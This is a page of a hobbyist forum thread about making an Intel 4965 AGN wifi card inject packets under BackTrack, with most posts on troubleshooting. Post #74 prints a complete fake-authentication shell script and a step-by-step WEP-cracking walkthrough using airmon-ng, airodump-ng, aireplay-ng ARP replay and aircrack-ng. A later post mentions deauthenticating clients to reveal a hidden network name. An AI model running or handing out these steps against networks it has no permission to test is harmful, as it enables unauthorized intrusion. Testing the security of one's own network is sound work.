Page 8 of 15 FirstFirst ... 678910 ... LastLast
Results 71 to 80 of 145

Thread: 4965 agn

  1. #71
    Just burned his ISO
    Join Date
    Dec 2008
    Posts
    21

    Default

    I'm unable to reproduce the error, so the only thing I can think of is, it's not copied and pasted correctly.

    Can you post your errors?

    Also keep in mind before trying this script make sure you're able to connect to the network using the basic commands. This script is only meant to aid in connecting, and continuously reconnecting.

    make a file called fake.conf and add this code into it, subsititue ESSID for the name of the network.

    Code:
    network={ 
     ssid="ESSID" 
     key_mgmt=NONE 
     wep_key0="fakeauth" 
     }
    then run

    Code:
    wpa_supplicant -c fake.conf -i wlan0 -Dwext
    If you successfully connect then the ./fakeit script should also work.

  2. #72
    Just burned his ISO
    Join Date
    Mar 2009
    Posts
    14

    Default

    Quote Originally Posted by ochlocracy View Post
    I'm unable to reproduce the error, so the only thing I can think of is, it's not copied and pasted correctly.

    Can you post your errors?

    Also keep in mind before trying this script make sure you're able to connect to the network using the basic commands. This script is only meant to aid in connecting, and continuously reconnecting.

    make a file called fake.conf and add this code into it, subsititue ESSID for the name of the network.

    Code:
    network={ 
     ssid="ESSID" 
     key_mgmt=NONE 
     wep_key0="fakeauth" 
     }
    then run

    Code:
    wpa_supplicant -c fake.conf -i wlan0 -Dwext
    If you successfully connect then the ./fakeit script should also work.
    Ok thx ochlocracy, I'll try this tonight.

    But I should defenitly install wpa_supplicant first isn't it?
    Where can I find the info if I do?

    (I am able to do everything from your steps untill I have to use the script, I can run it "sh fakeit". But it gives the error.)

    Thanks!

  3. #73
    Just burned his ISO
    Join Date
    May 2008
    Posts
    2

    Default

    Just to drop in some experiences with Toshiba Satellite P200-14H and 4965agn!

    The card works "Out of the Box" without any patching or anything! Just boot up BT4, follow the ochlocracy-s tutor and with help of wpa_supplicant (the code had some syntax errors but i've edited it to fit my needs), i've managed to crack my own AP! It doesn't recognize the chipset but that doesn't bother the BT4 to rule!

    It works like a charm!

    Now, i've bought a PCI-E Gigabyte WI07HT with Atheros chipset and the card speaks for herself!! Works also "Out of the Box", and of course, also cracked my own AP!

    So, both cards work like a charm and would recommend both of them!

    Peace out!

  4. #74
    Just burned his ISO
    Join Date
    Jan 2010
    Posts
    5

    Default

    Hello!

    I have got this working now, and want to give you people my 1-2-3 walktrough for get it working. I tink I'm not the only one finds this challenging.

    This works for my computer, my wifi card: Injection with aireplay-ng -3

    My working system:
    - Acer Aspire 5920g, with the wifi card: 4965 agn

    1) Backtrack 4 Beta (straigth install, no modification) on my 4gb cruzer micro memorystick.

    2) saved fakeit.sh (the updated one showed earlyer in this thread) in root folder on my backtrack system. The file looks like this:
    #!/bin/sh
    killall NetworkManager
    killall knetworkmanager
    killall wpa_supplicant
    clear
    echo ""
    echo "Enter the ESSID of the Target Network: (use last)"
    read SEL
    if [ "$SEL" != "" ]
    then
    echo ""
    if [ -e fake.conf ]; then
    echo "Deleting old fake.conf"
    rm fake.conf
    fi
    echo 'network={ \n ssid="'$SEL'" \n key_mgmt=NONE \n wep_key0="fakeauth" \n }' > fake.conf
    echo "Starting Fake Authentication with $SEL"

    else
    if ! [ -e fake.conf ]; then
    echo "ERROR - No config found, Provide ESSID"
    exit 1
    fi
    echo ""
    echo "Starting Fake Authentication with Previous ESSID"
    fi


    echo ""
    echo "How many times do you want to fake it? (30):"
    read TIMES
    if [ "$TIMES" = "" ]; then TIMES=30; fi


    echo ""
    echo "How many seconds between restarts? (45):"
    read SEC
    if [ "$SEC" = "" ]; then SEC=45; fi

    i=1
    while [ $i -le $TIMES ]
    do
    wpa_supplicant -c fake.conf -i wlan0 -Dwext -B
    echo ""
    echo "Fake Auth Connection ($i of $TIMES) Success ...maybe check airodump-ng to be sure."
    i=`expr $i + 1`
    if [ $i -le $TIMES ]; then
    echo "Reconnecting in $SEC seconds"
    sleep $SEC
    echo "Faking orgasam again... uh! ah! That's the spot!"
    fi
    done
    Open a text editor and paste the text in the qoute to the opened editor. Then you save it with the name fakeit, and move/paste the file to root folder. I have not maked this file, the big hero are ochlocracy. All creds to him, I just borrowing for my own use and guiding. More information about it earlier in this thread.

    3) Did the guide ochlocracy have made in the previous site. In my tutorial I have borrowed from him again! (He is still the hero ) Here are my version of it:

    My working walktrough:

    #=means write whatever stands after it in and push enter.
    BSSID=write your own router mac
    ESSID=write your own router name.
    FILENAME=change to your filname of choice.


    First monitor mode my card:

    #Airmon-ng start wlan0

    Check wifi net around me:

    #airodump-ng mon0

    Remember/copy the router mac adress (BSSID), name (ESSID) and channel.

    Stop mon0 and wlan0, and start wlan0 with the right router channel.

    #airmon-ng stop mon0
    #airmon-ng stop wlan0

    #airmon-ng start wlan0 1 (choose your channel)

    Start saving #data from router:

    #airodump-ng -c 1 --bssid BSSID -w FILENAME mon0

    Open a new window and type:

    #./fakeit
    or
    #sh fakeit

    Answer what asked for.

    Open a new window and do the ARP attack (-3):

    #aireplay-ng -3 -b BSSID mon0

    Now the #data should increase after a short time and injection are doing it's job!

    At last open a new window and crack your router when you got an amount of packets.



    #aircrack-ng -b BSSID FILENAME-01.cap

    ..Cracking password

    Done!



    Okey, that's my working setup and system.
    But sometimes it takes long time, or the injection does not work. What do you people think the problem could be? Can it be to little traffic on my wifi net that make this not generate #data before a long time have past? (Thats my teory. But I'm just the noob) It just tells me: "Reading packages ......." and the number increase, but nothing else is happening. (0 pps)
    Is it actually possible to make injection work with low or none traffic on the wifi net?

    EDIT: On the aircrack-ng wiki i read that it need to be traffic between AP and another client for aireplay-ng -3 to get usefull. Make sure you are near enough to get #data, and make sure it's traffic to the AP. So forget the above questions.


    All I need for cracking wep with my system are mentioned in this reply. Hope it's to help for some people with similar systems. However it seems for me that it's a little buggy, but it works.
    Please come with developing suggestions!


    At last I exusing myself for my bad english. Hope you understand some of it

    Regards!

  5. #75
    Just burned his ISO
    Join Date
    Dec 2008
    Posts
    21

    Default

    Glad my script finally worked for someone else.

    Usually when injection doesn't work, mon0 is not on the correct channel, or you're too far from the AP, typically just tilting my laptop screen (where my antenna is) a little bit gets things going.

    If you tell the script to connect only 1 time for 3600 sec. do your Data# stop collecting at any point?

  6. #76
    Just burned his ISO
    Join Date
    Jan 2009
    Posts
    11

    Default

    Hey all.

    Alright, So I can get injection to work, but when I try to use fakeit.sh, I keep getting an error message at the beginning:

    Code:
    :bad variable name
    fakeit.sh: 52: Syntax error: "done" unexpected (expecting "then")
    Any ideas?

    EDIT: Sorry, I suppose I should tell you a bit more. I get this error message after being asked (and entering) the ESSID to be cracked.

  7. #77
    Just burned his ISO
    Join Date
    Jun 2006
    Posts
    22

    Default

    You copy/pasted it? Mistyped 'fi' with 'if' somewhere? Deleted new lines withouth adding ';'?
    Script should work!

  8. #78
    Just burned his ISO
    Join Date
    Jan 2009
    Posts
    11

    Default

    Quote Originally Posted by bloody View Post
    You copy/pasted it? Mistyped 'fi' with 'if' somewhere? Deleted new lines withouth adding ';'?
    Script should work!
    I did indeed copy paste it. I'll look through for any misspellings and post back later, though.

  9. #79
    Just burned his ISO
    Join Date
    Jan 2009
    Posts
    11

    Default

    As far as I can tell, there are no misspellings.

  10. #80
    Just burned his ISO
    Join Date
    Jan 2010
    Posts
    5

    Default

    To you people that do have trouble with the sh script:

    I did try to get an answar. I found out that my problem was that I did make the file in a windows-textfile (added into notepad). That give me errors when executing the script.

    If I did open a new textfile in linux and paste the script in, then it works.
    Here are an exampel to illustrate: h**p://saftus.net/file/snapshot4.png

    Hope this helps you people!

    To you ochlocracy:
    It seems like I have to do more than one try. However, I have not tested it enough to be clear about that. I'll tell more when i know more.

    New discovery:
    It looks like I can't do the script when I try to crack a router with invisible essid (name).
    - I start airodump-ng and #data increases.
    - I do a deauth to get essid. Works, getting it.
    - Then I do the fakeit script, and #data stops increase. Everything else are normal.
    - Then I have to start all over again with my procedure. It always stops with #data not increasing, because there are something happening when doing fakeauth after I do a deauth to get essid.

    Any thoughts about that?

    Regards!

Page 8 of 15 FirstFirst ... 678910 ... LastLast

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •